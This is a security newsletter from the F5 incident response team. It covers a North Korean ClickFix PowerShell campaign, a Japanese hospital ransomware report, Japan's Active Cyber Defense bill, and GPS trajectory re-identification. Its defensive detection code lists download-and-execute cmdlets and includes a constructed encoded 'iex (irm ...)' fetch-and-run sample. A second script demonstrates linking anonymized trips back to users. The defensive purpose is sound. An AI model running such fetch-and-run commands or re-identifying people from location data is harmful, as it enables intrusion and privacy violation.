Exploit PowerShell, Ransomware Attack Report, Active Cyber Defense, Attack on GPS
Notable news for the week of Feb 9-15, 2025. This week, your editor is Koichi from F5 Security Incident Response Team. In this edition, I have security news about Exploit PowerShell, Ransomware Attack Report, Active Cyber Defense, Attack on GPS.
We at F5 SIRT invest a lot of time to understand the frequently changing behavior of bad actors. Bad actors are a threat to your business, your reputation, your livelihood. That’s why we take the security of your business seriously. When you’re under attack, we’ll work quickly to effectively mitigate attacks and vulnerabilities, and get you back up and running. So next time you are under a security emergency, please contact F5 SIRT.
New Targeted Attack: Exploit PowerShell
The Microsoft Threat Intelligence team has posted a series of posts on X.com saying that it has observed a new targeted attack method used since January 2025 by Kimsuky, a threat actor believed to be North Korea-linked.
An attacker using this method first impersonates a South Korean government official and builds trust with the target (who is expected to be in South Korea) over time. The attacker then sends a spear-phishing e-mail with a PDF attachment, and the target is persuaded to click a URL that leads to a list of steps to register their Windows system.
Once the URL is clicked, the page prompts the target to launch PowerShell as an administrator and copy and paste the displayed code snippet into the terminal. The pasted code downloads a browser-based remote desktop tool and installs it, together with a certificate file with a hard-coded PIN fetched from a remote server. This gives the attacker control of the target PC and the ability to exfiltrate sensitive information from it.
This targeted attack uses the ClickFix method, which has also been observed in other threat campaigns. In December 2024, actors connected to the Contagious Interview campaign tricked users into copying and running a malicious command on their Apple macOS systems through the Terminal app, after which the attacker could access the camera and microphone through the web browser.
Source: North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack
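The common thread in the ClickFix pattern described above is a single pasted PowerShell block that both fetches something from a remote host and then installs or runs it. The following is an added example, not code from the original post or from Microsoft, of how a defender might triage PowerShell Script Block Logging text (Windows PowerShell Operational event 4104, which only exists when Script Block Logging is enabled) for that fetch-then-run chain. The indicator lists, the handling of `-EncodedCommand` payloads, and all sample blocks are my own assumptions and constructed inputs.

```python
"""Added example: triage PowerShell script block text for the ClickFix-style
"download a tool, then install/run it" chain described above.

Assumptions (not from the original post): input is the ScriptBlockText of a
Windows PowerShell Operational log event 4104 (Script Block Logging must be
enabled for these to exist); the indicator lists below are a starting point,
not a complete signature set; sample blocks are constructed, not real captures.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# Cmdlets, aliases and .NET members that fetch content from a remote host.
DOWNLOAD_PATTERNS = [
    r"\bInvoke-WebRequest\b", r"\biwr\b", r"\bwget\b", r"\bcurl\b",
    r"\bInvoke-RestMethod\b", r"\birm\b", r"\bStart-BitsTransfer\b",
    r"\.DownloadString\(", r"\.DownloadFile\(",
]
# Cmdlets and tools that run or install what was fetched (the post mentions a
# remote desktop tool and a certificate file being installed).
EXECUTE_PATTERNS = [
    r"\bInvoke-Expression\b", r"\biex\b", r"\bStart-Process\b",
    r"\bExpand-Archive\b", r"\bmsiexec\b",
    r"\bImport-PfxCertificate\b", r"\bcertutil\b",
]
# powershell.exe accepts -EncodedCommand and its prefixes (-e, -ec, -enc) with a
# base64 payload of UTF-16LE text; the payload hides the real commands.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    verdict: str                    # "clean", "download-only" or "download-and-run"
    download_hits: list = field(default_factory=list)
    execute_hits: list = field(default_factory=list)
    decoded: list = field(default_factory=list)   # payloads recovered from -EncodedCommand


def expand_encoded(text: str) -> list:
    """Return the decoded UTF-16LE payload of every -EncodedCommand found in text."""
    out = []
    for b64 in ENCODED_RE.findall(text):
        try:
            out.append(base64.b64decode(b64, validate=True).decode("utf-16le"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not a well-formed payload; plain-text matching still applies
    return out


def _hits(patterns, text):
    return sorted({p for p in patterns if re.search(p, text, re.I)})


def triage(script_block: str) -> Finding:
    """Classify one script block by whether it both fetches and runs/installs content."""
    decoded = expand_encoded(script_block)
    text = "\n".join([script_block, *decoded])   # match on visible and decoded text
    dl, ex = _hits(DOWNLOAD_PATTERNS, text), _hits(EXECUTE_PATTERNS, text)
    if dl and ex:
        verdict = "download-and-run"
    elif dl:
        verdict = "download-only"
    else:
        verdict = "clean"
    return Finding(verdict, dl, ex, decoded)


# Constructed sample script blocks (not real captures; example.invalid is a reserved name).
SAMPLES = {
    "admin_inventory": r"Get-ChildItem -Path C:\Users -Recurse | Where-Object Length -gt 1MB",
    "plain_download": "Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile report.csv",
    "fetch_and_install": (
        r"$u='https://example.invalid/rd.zip'; iwr $u -OutFile $env:TEMP\rd.zip; "
        r"Expand-Archive $env:TEMP\rd.zip $env:TEMP\rd; Start-Process $env:TEMP\rd\setup.exe"
    ),
    # The same kind of chain hidden behind -EncodedCommand; built here so it stays readable.
    "encoded_fetch_and_run": "powershell -nop -enc " + base64.b64encode(
        "iex (irm https://example.invalid/run.ps1)".encode("utf-16le")).decode(),
}

if __name__ == "__main__":
    for name, block in SAMPLES.items():
        f = triage(block)
        print(f"{name:24} {f.verdict:18} dl={f.download_hits} ex={f.execute_hits}")
```

A "download-and-run" verdict on a block that was typed interactively by a user who normally never opens an elevated PowerShell is the kind of event worth an analyst's attention; the "download-only" class stays as context so that ordinary administrative downloads do not page anyone.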
Detailed Report of the Ransomware Attack
On May 19, 2024, a ransomware group broke into the information system of Okayama Psychiatric Medical Center in Okayama prefecture. This caused the electronic medical record (EMR) system to be completely shut down. The Okayama Psychiatric Medical Center’s system vendor looked into the incident on the same day. The investigation showed that many servers and clients had been attacked and that the ransomware had locked storage. They attempted to recover the system; however, they could not, because all mission-critical data had been lost.
Furthermore, it was later discovered that up to 40,000 people’s personal information had been leaked. This was the 15th reported ransomware attack against a hospital in Japan. It took 90 days to recover the information system, including the EMR. Subsequently, an incident investigation was conducted by an external committee, and the report of the investigation, the "Ransomware Incident Investigation Report", was published on February 13, 2025. The report is 62 pages long, and readers can learn about the incident, the subsequent response, and the lessons drawn from them.
The report says that VPN devices were probably the first targets of the attack. It is possible that weak passwords, or passwords shared with other devices, were in use. Additionally, hardening measures such as software updates and detailed logging settings may not have been in place. The day after the attack was discovered, the internet connection was cut off to contain it. The whole system was scanned with multiple anti-virus programs. In addition, password policies were tightened and remote desktop connections were blocked.
The Okayama Psychiatric Medical Center has made this report public so that other hospitals and organizations can take preventive measures against ransomware attacks. Many cyber-security professionals will be able to draw lessons from it.
Source: Ransomware Incident Investigation Report (Japanese)
"Active Cyber Defense" Part 3
In previous TWIS articles, I wrote about the “Active Cyber Defense” that the Japanese government is trying to introduce, and there has been progress.
The Japanese government was concerned that, under the current legal regime, no one could conduct counter-measures against a cyber attack, so it has been preparing an “Active Cyber Defense” bill aimed at strengthening national cyber security capabilities.
The bill was supposed to be submitted by the end of 2024. However, it was delayed, and was approved by the country’s main party, the Liberal Democratic Party (LDP), in January. The cabinet finally approved the bill on February 7, and it was sent to the Diet. After deliberations in the House of Representatives and the House of Councilors, the bill is expected to be enacted. The bill aims to take more proactive measures against cyber attacks before they cause widespread damage.
The Japanese government’s urgency to pass this bill can be attributed to the recent surge in DoS attacks and the fact that 70% of email attacks are in Japanese. This is also supported by a warning in January from Japan's national police that the Chinese state-backed threat actor MirrorFace has been committing wide-scale cyber espionage since 2019 to steal Japan's national security secrets.
However, even if the Active Cyber Defense bill is enacted, problems remain: although it is called “Active”, it cannot actually preempt an attack and can only be activated after one has been suffered, and there is not enough personnel to carry it out nationwide.
Source: Japan Goes on Offense With New 'Active Cyber Defense' Bill
Another attack methodology against GPS
Modern vehicles, ships, and aircraft use Global Navigation Satellite System (GNSS) positioning, which lets anyone know their position at any time. GPS is the most widely used GNSS, and GNSS positioning is commonly referred to as GPS. Since GPS is also used by weapons, it is interfered with on the battlefield, but the effects go beyond the battlefield: GPS jamming and spoofing attacks have been observed around the Black Sea.
The best-known attacks on GPS are jamming and spoofing. However, on February 12, a paper was published on a new vulnerability of GPS trip data to a re-identification attack called Trajectory-User Linking (TUL).
Privacy of location data is often neglected because practicality is given priority. Where it is addressed, a common approach is to remove personal identifiers from GPS data.
However, the paper argues that simply removing personal identifiers from GPS data does not preserve privacy. A Trajectory-User Linking attack recovers the user’s identity from trip data even after the personal identifiers have been removed, so removing identifiers alone is no longer safe.
The paper also argues that users who frequent places visited by only a few others tend to be more vulnerable to re-identification.
Source: Investigating Vulnerabilities of GPS Trip Data to Trajectory-User Linking Attacks
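The practical question for anyone who publishes or shares trip data is how much re-identification risk remains after the identifiers are stripped. The following is an added example, not code from the paper or from the original post, of a small risk-assessment check: it takes a constructed labelled history of users' past trips, links a batch of "anonymized" trips back to those users by the rarity of the places they share, and reports the re-identification rate together with a per-user rarity score. The reduction of trips to sets of place cells, the log-rarity weighting, the tie handling, and all data are my own assumptions; it is one simple instance of the linking idea, not the paper's method.

```python
"""Added example: estimating trajectory-user linking (TUL) risk for a set of
GPS trips before releasing them with identifiers removed.

Assumptions (not from the paper or the post): trips are reduced to the set of
place cells they touch; an adversary holds labelled history for the same users
(past trips with identifiers); linking scores a candidate user by the rarity of
the places they share with the anonymous trip. All data below is constructed.
"""
import math
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Constructed labelled history: user -> trips, each trip the set of cells visited.
# cell_C is an office everyone visits; cell_A1/cell_G1 are unique to alice;
# carol and dave share all of their places and so cannot be told apart.
HISTORY: Dict[str, List[Set[str]]] = {
    "alice": [{"cell_A1", "cell_C"}, {"cell_C", "cell_G1"}],
    "bob":   [{"cell_B1", "cell_C"}, {"cell_C", "cell_K"}],
    "carol": [{"cell_D", "cell_C"}, {"cell_C", "cell_K"}],
    "dave":  [{"cell_D", "cell_C"}, {"cell_K", "cell_D"}],
}

# Constructed "anonymized" release: identifiers stripped; the truth is kept only
# so that the linking result can be scored.
ANON_RELEASE = [
    ("alice", {"cell_A1", "cell_C"}),
    ("bob",   {"cell_B1", "cell_K"}),
    ("carol", {"cell_D", "cell_K", "cell_C"}),
    ("dave",  {"cell_D", "cell_C"}),
    ("alice", {"cell_G1", "cell_C"}),
]


def build_profiles(history):
    """Collapse each user's history into the set of places they have visited."""
    return {user: set().union(*trips) for user, trips in history.items()}


def place_weights(profiles):
    """Rarity weight per place: log(users / users who visited it). Shared by all -> 0."""
    visitors = defaultdict(int)
    for places in profiles.values():
        for p in places:
            visitors[p] += 1
    n = len(profiles)
    return {p: math.log(n / c) for p, c in visitors.items()}


def link_trip(trip, profiles, weights) -> Optional[str]:
    """Return the single best-matching user, or None when evidence is absent or tied."""
    scores = {}
    for user, places in profiles.items():
        shared = sorted(trip & places)          # sorted so equal profiles score identically
        scores[user] = sum(weights.get(p, 0.0) for p in shared)
    best = max(scores.values())
    winners = [u for u, s in scores.items() if s == best]
    if best <= 0.0 or len(winners) != 1:
        return None
    return winners[0]


def user_rarity(profiles, weights):
    """Mean rarity of a user's places: higher means fewer others share their haunts."""
    return {u: sum(weights[p] for p in sorted(places)) / len(places)
            for u, places in profiles.items()}


def evaluate(history, release):
    """Link every released trip against the history and report the re-identification rate."""
    profiles = build_profiles(history)
    weights = place_weights(profiles)
    results = []
    for truth, trip in release:
        guess = link_trip(trip, profiles, weights)
        results.append((truth, guess, guess == truth))
    correct = sum(1 for _, _, ok in results if ok)
    return {
        "results": results,
        "linked": sum(1 for _, g, _ in results if g is not None),
        "correct": correct,
        "rate": correct / len(release),
        "rarity": user_rarity(profiles, weights),
    }


if __name__ == "__main__":
    report = evaluate(HISTORY, ANON_RELEASE)
    for truth, guess, ok in report["results"]:
        print(f"true={truth:6} linked_to={guess!s:6} correct={ok}")
    print(f"re-identified {report['correct']}/{len(ANON_RELEASE)} trips ({report['rate']:.0%})")
    for user, r in sorted(report["rarity"].items(), key=lambda kv: -kv[1]):
        print(f"{user:6} rarity={r:.3f}")
```

On the constructed data, every trip containing a place unique to one user is linked back to that user, while carol and dave, whose places are all shared, tie and stay unlinked. That matches the point made above: the users with the highest rarity score are the ones re-identified, so a release check of this kind tells you which records need coarser cells, suppression, or aggregation before the data goes out.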